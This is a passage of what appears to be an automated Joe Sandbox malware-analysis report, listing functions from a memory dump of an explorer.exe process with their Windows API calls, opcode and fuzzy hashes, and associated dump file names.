                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Crypt$ContextHash$AcquireCreateDestroyDirectoryInformationObjectReleaseSingleSystemVolumeWait
                                                                            • String ID:
                                                                            • API String ID: 2609862481-0
                                                                            • Opcode ID: 13fdeda7c2e5c2250e802208b82858c93158c3d073d366ca9cf810559a951751
                                                                            • Instruction ID: 1aa98583b266780df051f7f020d524762eb92e576b8fddfaea845509849d8958
                                                                            • Opcode Fuzzy Hash: 13fdeda7c2e5c2250e802208b82858c93158c3d073d366ca9cf810559a951751
                                                                            • Instruction Fuzzy Hash: BD114C32228AC482E760DB64F8987AF73E1F784744F904126E789C7E98DB7EC548CB04
                                                                            Function 00BFC360 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProcWindow
                                                                            • String ID:
                                                                            • API String ID: 181713994-0
                                                                            • Opcode ID: 02aa5fef786a4fb99182c43541bf79e51a5a4e61dda55fb9103a89aab660f712
                                                                            • Instruction ID: 51c32ffdb0ad0fe18974940499ab93432635ff75d4d1afe23ef82dd19e17e611
                                                                            • Opcode Fuzzy Hash: 02aa5fef786a4fb99182c43541bf79e51a5a4e61dda55fb9103a89aab660f712
                                                                            • Instruction Fuzzy Hash: 51015B7214C28DC7D624DB58E18423ABBE0F385384F1042A6F78647B19CB7DC8C98B46
                                                                            Function 00BF7AF0 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProcWindow
                                                                            • String ID:
                                                                            • API String ID: 181713994-0
                                                                            • Opcode ID: f1e5726a2f09741b6e4c8e908db0c6a897dd3715062ec5dd15aeb9964fb7b25b
                                                                            • Instruction ID: d51560e44a518108002b321b6feec93c3f463f8b38552a2baf8efdb50fa34131
                                                                            • Opcode Fuzzy Hash: f1e5726a2f09741b6e4c8e908db0c6a897dd3715062ec5dd15aeb9964fb7b25b
                                                                            • Instruction Fuzzy Hash: A201293658C688CBD6209B58E47423AB7E0F3CA355F6002E6F7C543A1ACF7DC9998B41
                                                                            Function 00BE44B0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: da2af1d5358e45a80c7f840fe45fc6962c5d488a89f3c32c77541c1115099bd7
                                                                            • Instruction ID: 23710b3f1c543a53ee69adb7264903b90c1a11bd136026bdc7910f471b103390
                                                                            • Opcode Fuzzy Hash: da2af1d5358e45a80c7f840fe45fc6962c5d488a89f3c32c77541c1115099bd7
                                                                            • Instruction Fuzzy Hash: 4701313471478183F7109B26F865BA726E0F7A5348F6046B5D45ACA6A8FB7CC949D380
                                                                            Function 00BF9929 Relevance: 1.5, APIs: 1, Instructions: 30libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddressForCaller.KERNELBASE ref: 00BF998F
                                                                            • GetProcAddress.KERNEL32 ref: 00BF99EE
                                                                            • LoadLibraryExW.KERNEL32 ref: 00BF9A38
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$CallerLibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 3311809864-0
                                                                            • Opcode ID: 1f33e0d227f083223617d2c48e540e55c391f4ebc574c8c2512f086ed87e3818
                                                                            • Instruction ID: d359f33577629467e1d40c09c648155f6f0493bbdb777d292a2e70dff7ec642c
                                                                            • Opcode Fuzzy Hash: 1f33e0d227f083223617d2c48e540e55c391f4ebc574c8c2512f086ed87e3818
                                                                            • Instruction Fuzzy Hash: 3E01A536718BC9C5DB30CB04E490BAAB3A0F7C6744F814515D68E43A68DB7DD559CF41
                                                                            Function 00BF8CE3 Relevance: 1.5, APIs: 1, Instructions: 30libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddressForCaller.KERNELBASE ref: 00BF8D4C
                                                                            • GetProcAddress.KERNEL32 ref: 00BF8DAE
                                                                            • LoadLibraryW.KERNEL32 ref: 00BF8DF8
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$CallerLibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 3311809864-0
                                                                            • Opcode ID: 29f24ca8af7b1ec7b39b311e50dcf5f0945885a2f14febe62e27be05c9337b80
                                                                            • Instruction ID: a68995b6ef28b84eb3b4f93a0dd1c6a241a7d982347d5560fbd91bf50936508a
                                                                            • Opcode Fuzzy Hash: 29f24ca8af7b1ec7b39b311e50dcf5f0945885a2f14febe62e27be05c9337b80
                                                                            • Instruction Fuzzy Hash: B601C43A218BC9CADB70CB04E4C47AAB3A4F7DA744F800116D68E83B68DF39C509CB41
                                                                            Function 00BF78A0 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: 972676e2263dc913d8f0aceba4ed3926a994122b1158fd80d1085a60b805af4a
                                                                            • Instruction ID: 991b311437c44733bd0b74da394ebd62b98a690d4056bf1e9bf2514c40a35685
                                                                            • Opcode Fuzzy Hash: 972676e2263dc913d8f0aceba4ed3926a994122b1158fd80d1085a60b805af4a
                                                                            • Instruction Fuzzy Hash: E8F06530A48B4582FBA0EF15F828BEA23E1F348344F8047A6E649472A0CF7CC18CC705
                                                                            Function 00BE5230 Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: 97899df86d47d9c0d290823c76a79fd567d6de1076d23b08f7a01fa9945c199d
                                                                            • Instruction ID: 6421d9e3d0e88371d6511fcc289be3dc399c08193801ee142204eaf3b5b099c9
                                                                            • Opcode Fuzzy Hash: 97899df86d47d9c0d290823c76a79fd567d6de1076d23b08f7a01fa9945c199d
                                                                            • Instruction Fuzzy Hash: BFF01A31E09A81C6F7709B61F86879523E1F36436CFA05665D6864A660CFBCC588D644
                                                                            Function 00BFC130 Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: 7bf3fda03488cde0f2424b2de49cc3ea02773bfd36645c5761c3d60d64d8c9f6
                                                                            • Instruction ID: ab3226cc461d0f74f9614d4710a0c44ea72c47d1b7f7e885cc769d39dfad24bc
                                                                            • Opcode Fuzzy Hash: 7bf3fda03488cde0f2424b2de49cc3ea02773bfd36645c5761c3d60d64d8c9f6
                                                                            • Instruction Fuzzy Hash: 82E04631604B4892F730DB20FD18B923BA0F389358F904625CA4D52671CFBCC2EDC600
                                                                            Function 00C049DB Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 46766f59590c43c0cb273360e60c28dcd038db0768a1794d386c2c23107aae88
                                                                            • Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
                                                                            • Opcode Fuzzy Hash: 46766f59590c43c0cb273360e60c28dcd038db0768a1794d386c2c23107aae88
                                                                            • Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
                                                                            Function 00C049EF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 48b5383b38cba486ddfa990dbca9aa2bd6a836a40005c426cf510de7b801e9cc
                                                                            • Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
                                                                            • Opcode Fuzzy Hash: 48b5383b38cba486ddfa990dbca9aa2bd6a836a40005c426cf510de7b801e9cc
                                                                            • Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
                                                                            Function 00C0491C Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 3a1423a10d6c23ad0d70ca8df7085a05a4326c9adc261c3d6554e918dcf8160a
                                                                            • Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
                                                                            • Opcode Fuzzy Hash: 3a1423a10d6c23ad0d70ca8df7085a05a4326c9adc261c3d6554e918dcf8160a
                                                                            • Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
                                                                            Function 00C04ABE Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 5cd527b682022ef2e181432df0d08e7952cbdf5ffb770021f4e618f9a49ae03e
                                                                            • Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
                                                                            • Opcode Fuzzy Hash: 5cd527b682022ef2e181432df0d08e7952cbdf5ffb770021f4e618f9a49ae03e
                                                                            • Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
                                                                            Function 00C04BC1 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 066845098519c5cfd41540883547bc2673087f9916ed1057274385ce232eb9ba
                                                                            • Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
                                                                            • Opcode Fuzzy Hash: 066845098519c5cfd41540883547bc2673087f9916ed1057274385ce232eb9ba
                                                                            • Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
                                                                            Function 00C04BF6 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: f9167c6025ceaf99fe249accd0e6505652e1a8aee71905078ff3a5cba5771e6b
                                                                            • Instruction ID: c1f29c0aac6beda0849fe06be852842039c9706aa404a5506b803bbaf64a81d4
                                                                            • Opcode Fuzzy Hash: f9167c6025ceaf99fe249accd0e6505652e1a8aee71905078ff3a5cba5771e6b
                                                                            • Instruction Fuzzy Hash: FED017B2619680C7F6788B01E050BAB7360F7C0700F401010E39642994CF3CCA84CE00
                                                                            Function 00C04B0D Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
